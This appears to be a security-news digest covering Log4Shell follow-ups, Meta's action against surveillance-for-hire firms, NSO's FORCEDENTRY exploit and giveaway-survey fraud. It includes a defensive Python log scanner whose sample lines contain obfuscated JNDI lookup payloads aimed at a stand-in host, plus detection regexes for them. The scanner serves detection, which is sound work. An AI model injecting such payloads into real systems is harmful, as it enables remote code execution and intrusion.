Log4Shell Vulnerability (update)
Over the past week, new details and commentary around the vulnerability known as Log4Shell have continued to appear. First, a new denial-of-service vulnerability affecting Log4j 2 versions 2.0-alpha1 through 2.16.0 was made public. The flaw, tracked as CVE-2021-45105 (CVSSv3 7.5), is triggered by uncontrolled recursion in self-referential lookups, and its fix prompted the release of version 2.17.0.
New active exploitation campaigns have also been detected, this time by the operators of the TellYouThePass and Conti ransomware families, as well as by actors deploying the Dridex banking trojan and Meterpreter payloads. On this front, 360 Netlab published a report on the activity observed in its honeypots: samples from more than 30 malware families, distributed from IP addresses in more than 50 countries. The most prevalent malware seen in these honeypots were cryptominers such as Kinsing and XMRig, along with binaries from families such as Dofloo, Tsunami (including its Muhstik variant) and the Mirai botnet. As for confirmed intrusions, the Belgian Ministry of Defence acknowledged an attack on its systems that disrupted its activities for several days; Log4Shell exploitation is believed to have been the initial access vector. Finally, researchers at Blumira described an additional attack vector: JavaScript running in a victim's browser can open a WebSocket connection to a vulnerable Log4j service on the local machine or on the internal network, so a host with no port exposed to the Internet can still be reached with a lookup payload.
Also this week, the Five Eyes alliance (Australia, Canada, New Zealand, the United Kingdom and the United States) published a joint advisory with a series of recommendations for organisations affected by Log4Shell. In the US, CISA released log4j-scanner, a tool designed to identify web services vulnerable to either of the two remote code execution bugs in Log4j (CVE-2021-44228 and CVE-2021-45046). In China, the Ministry of Industry and Information Technology (MIIT) suspended its cyber-threat information-sharing agreement with Alibaba Cloud for at least six months, after Alibaba researchers reported the Log4j vulnerability to Apache without first notifying the ministry.
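As an added illustration (not code from this page, from CISA's log4j-scanner or from Netlab), the following Python shows the kind of check a defender runs over web-server logs to spot Log4Shell probes such as the ones the honeypots above recorded. Attackers rarely send a plain ${jndi:...}; they hide it behind nested Log4j lookups such as ${lower:j}, ${upper:n} or the default-value form ${::-j}, which the logger itself resolves before the JNDI lookup fires. The script emulates just those three lookup types until the string stops changing, then looks for the JNDI pattern; it also reports leftover lookups such as ${ctx:...} in request data, which are relevant to the CVE-2021-45105 recursion bug. The sample log lines and the 203.0.113.9 address are constructed for this example.

```python
import re

# Constructed sample access-log lines for this example (not from the page or any real capture).
# 203.0.113.0/24 is a documentation range, so none of these addresses is a real attacker host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [18/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [18/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 11 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.8 - - [18/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}${upper:n}di:${lower:rmi}://203.0.113.9:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [18/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 612 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/t}" "Mozilla/5.0"',
    '10.0.0.10 - - [18/Dec/2021:10:01:06 +0000] "GET /?q=${ctx:loginId} HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: no nested '$', '{' or '}' between the braces.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup such as ${jndi:ldap://host/x}; group 1 is the URI scheme.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)
# Any lookup prefix (ctx, env, sys, date, ...) still present after normalisation.
LOOKUP_PREFIX = re.compile(r"\$\{\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Emulate the three Log4j lookups attackers use purely to hide the string 'jndi'."""
    if ":-" in body:
        # ${key:-default} yields the default when the key resolves to nothing: ${::-j} -> "j"
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return rest.lower()
        if prefix.lower() == "upper":
            return rest.upper()
    # Anything else (jndi:, ctx:, env: without a default) is kept so the outer scan can see it.
    return "${" + body + "}"


def normalize_lookups(text: str) -> str:
    """Resolve innermost obfuscation lookups repeatedly until the text stops changing."""
    while True:
        resolved = INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            return text
        text = resolved


def classify(line: str) -> dict:
    """Return a verdict for one log line after de-obfuscating any lookups it contains."""
    norm = normalize_lookups(line)
    jndi = JNDI.search(norm)
    if jndi:
        return {"verdict": "jndi", "scheme": jndi.group(1).lower(), "normalized": norm}
    prefixes = sorted({p.lower() for p in LOOKUP_PREFIX.findall(norm)})
    if prefixes:
        # Not an RCE attempt, but a lookup string in untrusted input still deserves a look:
        # the CVE-2021-45105 recursion bug is reached through attacker-controlled ctx: values.
        return {"verdict": "lookup", "prefixes": prefixes, "normalized": norm}
    return {"verdict": "clean", "normalized": norm}


def scan(lines) -> list:
    """Classify every line; returns (line number, verdict dict) for each line that is not clean."""
    results = ((i, classify(line)) for i, line in enumerate(lines, 1))
    return [(i, r) for i, r in results if r["verdict"] != "clean"]


if __name__ == "__main__":
    for lineno, result in scan(SAMPLE_LOG_LINES):
        detail = result.get("scheme") or result.get("prefixes")
        print(lineno, result["verdict"], detail, result["normalized"][:90])
```

Run it as a script to print the non-clean lines, or feed real access-log lines into scan() in place of the sample list. It deliberately emulates only the lookups needed for de-obfuscation (lower, upper and the :- default), which covers the common variants seen in honeypot traffic but is not a full Log4j lookup engine; a line that resolves to a JNDI lookup with an ldap, rmi or dns scheme is the signal that matters.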
Know more: https://logging.apache.org/log4j/2.x/download.html
Meta takes action against surveillance-for-hire companies
Facebook’s parent company Meta has announced that, after months of investigation, it has removed seven companies in the surveillance-for-hire industry from its platforms for targeting people in more than 100 countries to collect information on them and manipulate and compromise their devices and accounts. This activity reportedly affected approximately 50,000 users, who have been notified. The removed companies are based in China, Israel, India and North Macedonia, and they operate against their targets in three phases: reconnaissance, carried out with automated tooling; engagement, in which they work to gain the trust of their victims; and exploitation, in which phishing is delivered to harvest credentials. Meta notes that, although these campaigns are usually dealt with at the exploitation phase, it is essential to disrupt the attack lifecycle in its early stages to prevent devices and accounts from being compromised later on. Given the severity of the violations, Meta reports that in addition to removing these companies from its platforms it has blocked their related infrastructure, issued cease-and-desist notices informing them that their activity has no place on the firm’s platforms, and shared its findings with researchers, other platforms and the authorities for appropriate action.
All the details: https://about.fb.com/wp-content/uploads/2021/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf
Google publishes in-depth analysis of NSO’s FORCEDENTRY exploit
Google’s Project Zero team recently published an in-depth analysis of NSO Group’s FORCEDENTRY exploit, which it considers one of the most technically sophisticated exploits it has ever analysed, placing NSO’s tooling on a par with that of state-sponsored Advanced Persistent Threats (APTs). The sample, analysed in collaboration with Apple’s Security Engineering and Architecture (SEAR) team, was used selectively throughout the year against activists, dissidents and journalists in several regions. FORCEDENTRY is a zero-click exploit: the victim does not need to open a link or grant any permission for the attack to succeed. It chains a number of techniques against Apple’s iMessage platform to bypass the device’s protections, take control of it and install NSO’s Pegasus spyware. The vulnerability it leverages (CVE-2021-30860, CVSSv3 7.8) has been fixed since September 2021, in iOS 14.8. Citizen Lab, which captured the FORCEDENTRY sample from a Saudi activist’s phone, has separately reported Pegasus being found alongside Predator, spyware developed by Cytrox, one of the surveillance-for-hire companies named in the Meta report and removed from its platforms.
Learn more: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Gift survey campaigns generate $80 million a month for malicious actors
Group-IB’s research team has published research estimating that fraud schemes built on giveaway surveys, used to collect personal and banking information, generate approximately $80 million per month for cybercriminals. The actors lure victims through website advertising, SMS, emails and pop-up notifications with the promise of a prize from a well-known brand in exchange for completing a survey. A distinctive feature of these campaigns is an infrastructure that shows different content to different users depending on certain parameters: the victim passes through several redirects, during which information about the user is collected and then used to serve content tailored to them. The final link is also customised for the specific user and can be accessed only once, which complicates detection of these malicious sites. Finally, these campaigns target more than 90 countries, with Europe the most affected region, and more than 120 companies have been impersonated.
All the information: https://www.group-ib.com/media/target-links-2021/